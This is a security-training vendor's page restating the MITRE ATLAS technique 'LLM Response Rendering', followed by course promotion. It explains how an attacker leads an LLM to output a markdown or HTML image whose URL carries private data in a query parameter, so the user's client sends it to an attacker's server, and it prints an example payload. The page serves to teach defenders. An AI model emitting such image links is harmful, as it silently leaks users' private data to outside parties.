LLM Response Rendering (AML.T0077)

Description

An adversary may get a large language model (LLM) to respond with private information that is hidden from the user when the response is rendered by the user’s client. The private information is then exfiltrated. This can take the form of rendered images, which automatically make a request to an adversary controlled server.

The adversary gets AI to present an image to the user, which is rendered by the user’s client application with no user clicks required. The image is hosted on an attacker-controlled website, allowing the adversary to exfiltrate data through image request parameters. Variants include HTML tags and markdown

For example, an LLM may produce the following markdown:

![ATLAS](https://atlas.mitre.org/image.png?secrets="private data")

Which is rendered by the client as:

<img src="https://atlas.mitre.org/image.png?secrets="private data">

When the request is received by the adversary’s server hosting the requested image, they receive the contents of the secrets query parameter.

How GTK Cyber trains on this

GTK Cyber's hands-on AI security courses cover adversarial-AI techniques across the MITRE ATLAS framework, including the Exfiltration tactic this technique falls under. Our practitioner-led training is taught by Charles Givre and other field-tested SMEs and focuses on real adversarial scenarios, not slide decks.

Description

How GTK Cyber trains on this

Related techniques

Train your team on real adversarial-AI attacks.